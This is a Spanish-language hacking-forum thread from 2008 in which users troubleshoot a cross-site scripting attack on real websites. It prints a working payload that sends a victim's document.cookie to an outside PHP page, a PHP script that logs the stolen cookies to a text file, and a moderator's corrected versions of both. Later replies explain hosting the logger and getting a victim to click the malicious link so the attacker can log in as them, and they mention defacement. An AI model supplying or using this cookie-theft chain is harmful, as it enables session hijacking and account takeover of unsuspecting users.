elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Ingresar Registrarse
08 Octubre 2008, 08:34  



+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking Avanzado
| | |-+  Hacking Básico (Moderador: zhyzura)
| | | |-+  cuestiones sobre XSS
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Imprimir
Autor Tema: cuestiones sobre XSS  (Leído 403 veces)
R41N-W4R3

Desconectado Desconectado

Mensajes: 222


Ver Perfil
cuestiones sobre XSS
« en: 04 Febrero 2008, 18:37 »



 Hola a todos....   estoy haciendo algunas pruebas en páginas que parecen ser vulnerables a XSS pero no consigo guardar la info de la cookie o direccionar la página....

  Estoy tratando de hacerlo en dos páginas diferentes, en las que si introduzco en el buscador de la pagina:
 
Código:
    <h1>XSS</h1>   

    <script>alert(document.cookie)</script>

   obtengo el resultado deseado...osea XSS en grande y la cookie consecutivamente.

  Pero si hago esto:
Código:
      <script>window.location='http://miweb.es/pillagalleta.php?cookie=’+document.cookie;</script>
No consigo que se guarde la cookie en el archivo de texto..... (el codigo q guarda la cookie en un txt es:

Código:
<?
$cookie = $_GET['cookie'];
$fichero = fopen("cookies.txt","a");
fwrite($fichero, "$cookie \n");
fclose($fichero);
?>

   tampoco consigo q se redireccione si solo pongo:
Código:
<script>window.location='http://miweb.es/';

   No se si esto es normal (pq filtren algo mas)o estoy haciendo algo mal...

 Gracias de antemano a todos.....un saludo

 pd: Perdon por preguntar algo tan manido como el XSS pero no consigo solucionarlo por mas que he tratado de hacerlo......
   
   
En línea
sch3m4
Colaborador

Desconectado Desconectado

Mensajes: 1.529

Nihil est in intelectu quod prius not fuerit insen


Ver Perfil
Re: cuestiones sobre XSS
« Respuesta #1 en: 04 Febrero 2008, 19:42 »

Citar
<script>window.location.href='http://miweb.es/pillagalleta.php?cookie=’+document.cookie;</script>

Citar
<?
$cookie = $_GET['cookie'];
$fichero = fopen("cookies.txt","a");
//fwrite($fichero, "$cookie \n");
fwrite($fichero, $cookie.chr(13).chr(10));

fclose($fichero);
?>
En línea

Proyecto Open Source (GNU) - PExtractor v0.19b

"Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.(...)"
R41N-W4R3

Desconectado Desconectado

Mensajes: 222


Ver Perfil
Re: cuestiones sobre XSS
« Respuesta #2 en: 05 Febrero 2008, 08:50 »



 Gracias por tu respuesta!!!   que estupido soy...  le faltaba  crear el hiperenlace .......... 

Tambien el salto de linea y el retorno de carro....



  muchas gracias.. voy a ver si va bien
En línea
BBOYHACK

Desconectado Desconectado

Mensajes: 168


#Bboyhacks#


Ver Perfil WWW
Re: cuestiones sobre XSS
« Respuesta #3 en: 05 Febrero 2008, 10:21 »

buenas amigos leyendo este post me emocione averiguar mas sobre XSS y lei varos tutos sobre ello..


bueno mi pregunta es la siguiente

en la web que encontre introdusco en el campo de busqueda

Citar
  <h1>XSS</h1>   

    <script>alert(document.cookie)</script>

y perfecto me sale un mensaje de alert  y luego el texto XSS en grande


luego siguiendo el post

Citar
<script>window.location.href='http://miweb.es/pillagalleta.php?cookie=’+document.cookie;</script>


Citar
<?
$cookie = $_GET['cookie'];
$fichero = fopen("cookies.txt","a");
//fwrite($fichero, "$cookie \n");
fwrite($fichero, $cookie.chr(13).chr(10));
fclose($fichero);

no se exatamente que hace pero por lo que se ve a simple vista va a guardar todos los cookie en la web que yo le estoy diciendo verdad...

es decir que pra esto tengo que tener una web dond el mande los cookie...

En línea

lastimosamente no puedo dirigirme a un cajero de un banco y decirle alto y claro:
Soy Bill Gates y deseo retirar 2 Millones de dolares y mi codigo es Windows


Blackhacking.no-ip.org
NewLog

Desconectado Desconectado

Mensajes: 315



Ver Perfil
Re: cuestiones sobre XSS
« Respuesta #4 en: 05 Febrero 2008, 13:35 »

Sí, necesitas una web con soporte de php.
En línea
R41N-W4R3

Desconectado Desconectado

Mensajes: 222


Ver Perfil
Re: cuestiones sobre XSS
« Respuesta #5 en: 05 Febrero 2008, 13:37 »



  Eso es, debes crearte una web (por ejemplo en iespana)  y pones un archivo en php que guarde la cookie  (con el codigo que has visto en el post). Con eso si consigues q la victima pulse sobre el enlace malicioso pues almacenas su cookie y puedes loguearte como si fueses el..... tambien pueden hacerse deface y otras cosas mas con XSS ...pero lo malo es que alguien debe pulsar el enlace.........

  Espero q te diviertas ^^   


  pd:  aun no consigo almacenar la cookie con la ayuda de lympex.. pero ya me falta menos :)
En línea
Páginas: [1] Ir Arriba Imprimir 
Ir a:  







Consolas     La Web de Goku     MilW0rm     MundoDivx

Hispabyte     Truzone     TodoReviews     ZonaPhotoshop

hard-h2o modding    Foros de ayuda    Yashira.org    Videojuegos    indetectables.net   

Noticias Informatica    Seguridad Informática    ADSL    Foros en español    eNYe Sec

Todas las webs afiliadas están libres de publicidad engañosa.

Powered by SMF 1.1.6 | SMF © 2006-2008, Simple Machines LLC